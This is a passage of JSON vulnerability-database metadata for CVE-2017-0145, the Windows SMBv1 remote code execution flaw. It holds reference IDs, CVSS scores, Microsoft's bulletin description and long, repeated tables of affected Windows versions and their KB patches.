{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB4014077", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, 
{"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 
2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based 
Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, 
{"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", 
"msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based 
systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 
(Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": 
"KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T12:46:46", "differentElements": ["msAffectedSoftware"], "edition": 72}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": 
"UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T14:58:45", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": 
["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012606", "KB4012213", "KB4013198", "KB3210721", "KB4012216", "KB3177186", "KB3205409", "KB3205401", "KB4014077", "KB4012212", "KB4013429", "KB4012598", "KB3213986", "KB3212646", "KB4012217", "KBMS16-110, 3187754", "KB3210720", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", 
